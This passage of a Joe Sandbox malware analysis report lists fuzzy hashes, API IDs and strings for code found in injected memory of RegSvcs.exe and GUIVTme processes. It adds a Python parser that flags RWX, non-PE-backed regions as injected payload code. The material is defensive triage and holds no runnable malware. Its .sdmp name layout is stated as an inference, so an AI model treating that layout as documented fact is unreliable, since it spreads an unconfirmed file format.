                                                                      • Instruction Fuzzy Hash: 571144B1C0061A9BCB14CF9AD545B9EFBF4FF88324F15816AD818B7240D378A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (rendered graphically in the original; the executed / not-executed colouring of the blocks is not recoverable here)
                                                                      Function 5cde5a0-5cde645: GlobalMemoryStatusEx is called in block 5cde5e6-5cde614; the two successor blocks (5cde616-5cde61c and the fall-through) merge at 5cde61d-5cde645.
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 05CDE607
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3251996337.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_5cd0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 39820414cbd95fb840f53fb6ec0dfdabfd245fed689bc7bc241ade21af4494db
                                                                      • Instruction ID: e5dd877e6badc4a3f1294fce8b02838b361f600a445769c101c02418f7df522b
                                                                      • Opcode Fuzzy Hash: 39820414cbd95fb840f53fb6ec0dfdabfd245fed689bc7bc241ade21af4494db
                                                                      • Instruction Fuzzy Hash: 6F1120B1C0065A9BCB10CF9AD444BDEFBF8BF88320F15816AD818A7240D378A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
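                                                                      The function records above all come from memory dumps of the injected RegSvcs.exe process (pid 14) that are marked "based on PE: false", i.e. code that was never on disk as an image. The script below is an added example, not part of the Joe Sandbox report: it parses records in exactly this layout (Memory Dump Source / Source File / Snapshot File / API ID / Instruction Fuzzy Hash), decodes the .sdmp file name, cross-checks it against the Snapshot File name and the stated Offset, and summarises per process which dumped regions are RWX and not PE-backed and which Win32 APIs their code calls. Two things are assumptions rather than documented format: the field layout of the .sdmp name (pid, phase, dump id, base address, protection), which is inferred from the report's own consistency (0000000E corresponds to hcaresult_14_2, 0000000005CD0000 to Offset 05CD0000), and the use of "$" as the separator for multi-valued API IDs, which is the separator the report visibly uses for String IDs. The value 0x40 for PAGE_EXECUTE_READWRITE is the documented Win32 constant. The sample input is three records copied from this page.

```python
"""Parse Joe Sandbox per-function disassembly records and summarise, per process,
which dumped memory regions the code came from and which Win32 APIs it calls.

ASSUMPTION (inferred from the report, not documented): the .sdmp name is
<pid>.<phase>.<dumpid>.<base>.<protect>.<...>.sdmp with hex fields, and '$'
separates multi-valued API IDs as it visibly does for String IDs.
"""
import re

PAGE_EXECUTE_READWRITE = 0x40  # documented Win32 memory-protection constant

SDMP_NAME = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.")
SNAPSHOT_NAME = re.compile(
    r"hcaresult_(?P<pid>\d+)_(?P<phase>\d+)_(?P<base>[0-9a-fA-F]+)_(?P<image>[^.]+)\.jbxd")


def _field(chunk, label):
    """Value after '• <label>:' on its own line; '' when the field is absent or empty."""
    m = re.search(rf"•[ \t]*{re.escape(label)}:[ \t]*(.*)", chunk)
    return m.group(1).strip() if m else ""


def parse_records(text):
    """Split report text into function records and decode their dump metadata."""
    records = []
    for chunk in text.split("Memory Dump Source")[1:]:
        src, snap = _field(chunk, "Source File"), _field(chunk, "Snapshot File")
        m_src, m_snap = SDMP_NAME.match(src), SNAPSHOT_NAME.search(snap)
        if not (m_src and m_snap):
            continue  # undecodable source line: skip rather than guess
        pid, base = int(m_src["pid"], 16), int(m_src["base"], 16)
        # Cross-check the assumed layout against the record's own redundant fields.
        if pid != int(m_snap["pid"]) or base != int(m_snap["base"], 16):
            raise ValueError(f"dump name and snapshot name disagree: {src!r} / {snap!r}")
        m_off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", src)
        if m_off and int(m_off.group(1), 16) != base:
            raise ValueError(f"Offset disagrees with dump base: {src!r}")
        records.append({
            "pid": pid,
            "image": m_snap["image"],
            "base": base,
            "protect": int(m_src["protect"], 16),
            "based_on_pe": "based on PE: true" in src,
            "apis": tuple(a for a in _field(chunk, "API ID").split("$") if a),
            "fuzzy_hash": _field(chunk, "Instruction Fuzzy Hash"),
        })
    return records


def summarise(records):
    """Per (pid, image): dumped regions, whether any is RWX and not PE-backed, APIs seen."""
    summary = {}
    for r in records:
        s = summary.setdefault((r["pid"], r["image"]),
                               {"regions": set(), "rwx_non_pe": False, "apis": set()})
        s["regions"].add(r["base"])
        if r["protect"] == PAGE_EXECUTE_READWRITE and not r["based_on_pe"]:
            s["rwx_non_pe"] = True  # executable private memory with no image: injected/unpacked code
        s["apis"].update(r["apis"])
    return summary


# Sample input: three records copied from this report page.
SAMPLE_REPORT = """
Memory Dump Source
• Source File: 0000000E.00000002.3245651258.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2e70000_RegSvcs.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Instruction Fuzzy Hash: CD215BB1C0065A9FCB10CFAAD445ADEFBB0BF48324F158269D858B7240D3346944CFA1
Memory Dump Source
• Source File: 0000000E.00000002.3251996337.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_5cd0000_RegSvcs.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Instruction Fuzzy Hash: 6F1120B1C0065A9BCB10CF9AD444BDEFBF8BF88320F15816AD818A7240D378A944CFA5
Memory Dump Source
• Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
Similarity
• API ID:
• String ID: 8gq
• API String ID: 0-1984363304
• Instruction Fuzzy Hash: 1232B438B00602CFDB25DF38E49462A7BB2FBC9755B14846ED4068B3A5DB35EC46CB91
"""

if __name__ == "__main__":
    for (pid, image), s in summarise(parse_records(SAMPLE_REPORT)).items():
        regions = ", ".join(f"{b:08X}" for b in sorted(s["regions"]))
        print(f"{image} (pid {pid}): regions {regions}; RWX non-PE: {s['rwx_non_pe']}; "
              f"APIs: {sorted(s['apis']) or 'none'}")
```

                                                                      Run against the full report text, the summary makes the triage point of this section in one line per process: the code that calls DeleteFileW and GlobalMemoryStatusEx lives in RWX private memory of RegSvcs.exe that is not backed by any PE, which is where injected, unpacked payload code is expected. The fuzzy hashes are retained per record so the same summary can be joined against other reports.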

                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3245398258.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_157d000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 474930236cdf39894f9490c01572976d126585e13520df2c53e85c146868dfae
                                                                      • Instruction ID: b78ad0a58d21ed6ec5f6bd56492688ef652a3a8d799060debb5e239e3f93a85c
                                                                      • Opcode Fuzzy Hash: 474930236cdf39894f9490c01572976d126585e13520df2c53e85c146868dfae
                                                                      • Instruction Fuzzy Hash: 262100B5604200DFDB16DF58E985B2ABBB5FF84314F24C96DD80A0F246D33AD407CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3245398258.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_157d000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cfb1d99e79867c3a071e02af9b262a0390457b926817d08ef70b20d581121e80
                                                                      • Instruction ID: 2aebacf81efb1a1ac2198e4ff09d0027c67696e39177e522c69fbe722ccbc2b3
                                                                      • Opcode Fuzzy Hash: cfb1d99e79867c3a071e02af9b262a0390457b926817d08ef70b20d581121e80
                                                                      • Instruction Fuzzy Hash: 412159755093808FDB03CF24D994B15BF71AF46214F28C5AAD8498F6A7C33A980ACB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8gq
                                                                      • API String ID: 0-1984363304
                                                                      • Opcode ID: 3a2e20dcf178df4816877fd2654bef5b56a9c362e5e28f3cb871fcbeadb083b6
                                                                      • Instruction ID: 14404594a35f83a27ed28c9d8bd8a0c8d8d2b375eda433d991ed581259d7fae4
                                                                      • Opcode Fuzzy Hash: 3a2e20dcf178df4816877fd2654bef5b56a9c362e5e28f3cb871fcbeadb083b6
                                                                      • Instruction Fuzzy Hash: 1232B438B00602CFDB25DF38E49462A7BB2FBC9755B14846ED4068B3A5DB35EC46CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPcq
                                                                      • API String ID: 0-3229073321
                                                                      • Opcode ID: e061df67cce919e3517e5f94f2fbf21d23252d51d88c49a29fd7b15d15efcd03
                                                                      • Instruction ID: 323d7022b8b20465f77238ebcf200dd977d106be385fc953b5b3a283e74d78b9
                                                                      • Opcode Fuzzy Hash: e061df67cce919e3517e5f94f2fbf21d23252d51d88c49a29fd7b15d15efcd03
                                                                      • Instruction Fuzzy Hash: FB3116717006228FCB58AB38C45882D7BF2AF8A62535108B9E506CF775DA36DC42CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPcq
                                                                      • API String ID: 0-3229073321
                                                                      • Opcode ID: 38a15fa6f4f7e028ebbcd14b330e48d8203c6a53e84bb19078de3a0fbf75e8bd
                                                                      • Instruction ID: fd649643495da1941d5ee64c59f81ec2cbadc7c40da2697ed7ab4f94aba63045
                                                                      • Opcode Fuzzy Hash: 38a15fa6f4f7e028ebbcd14b330e48d8203c6a53e84bb19078de3a0fbf75e8bd
                                                                      • Instruction Fuzzy Hash: AB21D475701622CFCB58AB79C55881D7BB2AF89A2636108B8E506CF775DE36DC42CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e956a184b46b47781992863baa9f001e218b92f9333e2dffaaf4fe916f3f1b5
                                                                      • Instruction ID: e5edc7d298e2e32b2298103a3f27ec8f2d0a03948659f52e89e58deef26beb44
                                                                      • Opcode Fuzzy Hash: 6e956a184b46b47781992863baa9f001e218b92f9333e2dffaaf4fe916f3f1b5
                                                                      • Instruction Fuzzy Hash: 6081AF39A00705CFDB25DB78D41869EBFB2EF88310F19856AE506A7274DB34AC85CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d60f0c36f7ce8e9a64da23fb7e12d370d31b3f66176adb227df6e7c754c5f85a
                                                                      • Instruction ID: 20a782b4ddaad7aae35556e666cbe81975987b9cbcf69575d1bf81f97f4f0d45
                                                                      • Opcode Fuzzy Hash: d60f0c36f7ce8e9a64da23fb7e12d370d31b3f66176adb227df6e7c754c5f85a
                                                                      • Instruction Fuzzy Hash: 5511A07AE00206DFCB40DFB8D8449EAFBF1FF9931071081AAE515D7221E7349955CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 11d55ef030bbccdc53aa1b5ef69f1967d04b252d478d4b950c332ce2d22b5198
                                                                      • Instruction ID: e7d1aeb34358efd1f002145390dc9e7bb93c260142297a44f37c8e7a47e08090
                                                                      • Opcode Fuzzy Hash: 11d55ef030bbccdc53aa1b5ef69f1967d04b252d478d4b950c332ce2d22b5198
                                                                      • Instruction Fuzzy Hash: 43019276F00206DFCB00DFB9D84489BFBF5FF8835071081AAE51997220E734A915CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2786c3dde9bf35b8cd40b0460888471464b8c0486ecbdbb54726bbc48b46f861
                                                                      • Instruction ID: bec6c5ea8bd35bed7ab98d3a7d5001cc266dd4a93c8b79ef9dc61dc12d456f0e
                                                                      • Opcode Fuzzy Hash: 2786c3dde9bf35b8cd40b0460888471464b8c0486ecbdbb54726bbc48b46f861
                                                                      • Instruction Fuzzy Hash: 9BF0CD70D0E3969FCBE19FB498050DABFF4EA12320B0801ABD4C9D3112E2380D14CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 300af409e69a7448dafb550ca5b28b8407b9b02bcaf4409761f4eb42809b089a
                                                                      • Instruction ID: 7473760b94af85eab1bc61bb6305033e922e0e9ad97a39b7d35860da44744824
                                                                      • Opcode Fuzzy Hash: 300af409e69a7448dafb550ca5b28b8407b9b02bcaf4409761f4eb42809b089a
                                                                      • Instruction Fuzzy Hash: 1CF01CB5A00306DFDB24DBA4C15979E7FB0AB48B24F28089AD402A73B4DBB48C84CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 684af0fa926865a08d2b63e9f5204c5ae4c5d28485d7a4e29643c9f4d7f6879b
                                                                      • Instruction ID: 10f32281d566a05c4e7c4649157bba73edd86d1201f10f6edbdbe6e2b18a4b8a
                                                                      • Opcode Fuzzy Hash: 684af0fa926865a08d2b63e9f5204c5ae4c5d28485d7a4e29643c9f4d7f6879b
                                                                      • Instruction Fuzzy Hash: F7D05B357002149FD714DB79F949A463B78EF49651F514095EA04CB364EB71DC14C7D1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0744fedb35c54bea5920b3c9dad942c16632b89800126c0c0580a64c8bca18c
                                                                      • Instruction ID: 35ef5f8a522a2d77caa2c7fb3d64b2d4bbd3c03e594619518cebeda36dd9ecaa
                                                                      • Opcode Fuzzy Hash: e0744fedb35c54bea5920b3c9dad942c16632b89800126c0c0580a64c8bca18c
                                                                      • Instruction Fuzzy Hash: 90D067B5D05219AF8F50EFF999051DEBBF8EE09250B104566D91DE7204E6705A108BD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8gq$D@d$D@d$D@d$D@d$D@d$D@d$D@d$D@d
                                                                      • API String ID: 0-3965891166
                                                                      • Opcode ID: 4a0a852dd1a97a646a98e3a3f0d3203a3b75ffecbe202f289417ab06b95adb2d
                                                                      • Instruction ID: 1ec793ed95f704c4cbafecc5c138fd2f2062f7647979ae6c39e8f7c7f81188b1
                                                                      • Opcode Fuzzy Hash: 4a0a852dd1a97a646a98e3a3f0d3203a3b75ffecbe202f289417ab06b95adb2d
                                                                      • Instruction Fuzzy Hash: 63327F38B00202CFDB15EF74D89466A77BBBB86315F208968D4069B799EF31EC46CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D@d
                                                                      • API String ID: 0-846468682
                                                                      • Opcode ID: eccf913a18b5146ed2ccf2b619c8bee210910b52fa0283354aa0f71ca33fb43c
                                                                      • Instruction ID: e5a5b543d6999cb56adfc04c79a76075f13c7581ff892ab3deb986a828195792
                                                                      • Opcode Fuzzy Hash: eccf913a18b5146ed2ccf2b619c8bee210910b52fa0283354aa0f71ca33fb43c
                                                                      • Instruction Fuzzy Hash: F081C139A00305CFDB16AFB4C85869ABBF7EF89310F148569E406A77A4DF34AC95CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPcq
                                                                      • API String ID: 0-3229073321
                                                                      • Opcode ID: 2d86e09a2c370a3112022c16bd29662b2e6fc8b577e60da936b052bf5a2ef10d
                                                                      • Instruction ID: bb28cc21594e40f1446e36b3b2b7bb59024ad1ae4461a58a3a3703183c92bc73
                                                                      • Opcode Fuzzy Hash: 2d86e09a2c370a3112022c16bd29662b2e6fc8b577e60da936b052bf5a2ef10d
                                                                      • Instruction Fuzzy Hash: 8E3104757006228FCB59AB38C45891D7BF6AF8A72676108B8E406CF775DE36DC42CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPcq
                                                                      • API String ID: 0-3229073321
                                                                      • Opcode ID: 596ad29d683ffdab8107bfe2893f9bbed1a88741eefe9421318356db7530b15d
                                                                      • Instruction ID: 64051e28a38cfc17c86dc72aae278b9c145f9e5b76f5bcea51147f0973548292
                                                                      • Opcode Fuzzy Hash: 596ad29d683ffdab8107bfe2893f9bbed1a88741eefe9421318356db7530b15d
                                                                      • Instruction Fuzzy Hash: 1521D4757016228FCB58AB78C55881D7BB6AF8A71636108B8E506CF775DE36DC42CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: db27c7141f9c8cb3960bcfb5584d49f2d6d3caa6cfa40891eb4cc47b1dba1bb8
                                                                      • Instruction ID: 9e813630dd673236259b75f1fc0b8bbd597627dbe2ea41fb774f3b1af2d87df5
                                                                      • Opcode Fuzzy Hash: db27c7141f9c8cb3960bcfb5584d49f2d6d3caa6cfa40891eb4cc47b1dba1bb8
                                                                      • Instruction Fuzzy Hash: 6A01B57AE002069FCB40EFB4D88489FFBF5FF89310710856AE519E7225EB30A915CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00c1551ec99c616a0752577b8cefd5023628e74c0ae945558346ac96452fddd1
                                                                      • Instruction ID: 2fe446bd0a687e5e8bd6b3fa07d029c0dfbb22e95835dbd30f1e2c1c7dc9b2dc
                                                                      • Opcode Fuzzy Hash: 00c1551ec99c616a0752577b8cefd5023628e74c0ae945558346ac96452fddd1
                                                                      • Instruction Fuzzy Hash: 48F01579A00306DFDF24DBA4C5597AD7BF2AB49714F250899D402AB7A0DBB48C84CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6f0171f26bafc40235169c3ca4508235037bca43737ff15017d97b3dc84319e
                                                                      • Instruction ID: 21b0d94d4d0701b9bbf8fc0baca8131d774e897c85d3a14899348b1874e23a1e
                                                                      • Opcode Fuzzy Hash: b6f0171f26bafc40235169c3ca4508235037bca43737ff15017d97b3dc84319e
                                                                      • Instruction Fuzzy Hash: E5E01AB1D01219AF8B809FA8A9052DE7BF9FE09310B110062DA09E7200E7705A058BE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 322a80dfbee78b0a6a39f85d5685d9f5eb3f3618ec2a36df54f80914d268dfde
                                                                      • Instruction ID: 38e88671573cb523f80072b45512173ffcd4e704357c62383c317a2ae9cfb0ec
                                                                      • Opcode Fuzzy Hash: 322a80dfbee78b0a6a39f85d5685d9f5eb3f3618ec2a36df54f80914d268dfde
                                                                      • Instruction Fuzzy Hash: 7DD012397102149FC714EB65E949A85377DEB0A711F504095E504CB254EB61EC14C7E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fa04506a471fd2ff553c161a0db1c9f890c1ba55689ea9cc824d39a72eea72c
                                                                      • Instruction ID: 58db5ca8b7704a0431d9a3347963df349c7f15820adff125dd5224e5822a6483
                                                                      • Opcode Fuzzy Hash: 2fa04506a471fd2ff553c161a0db1c9f890c1ba55689ea9cc824d39a72eea72c
                                                                      • Instruction Fuzzy Hash: 25D067B5D01219AF8F40EFF999062DEBBF8FE09250B104566D919E3600E6705A108BD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%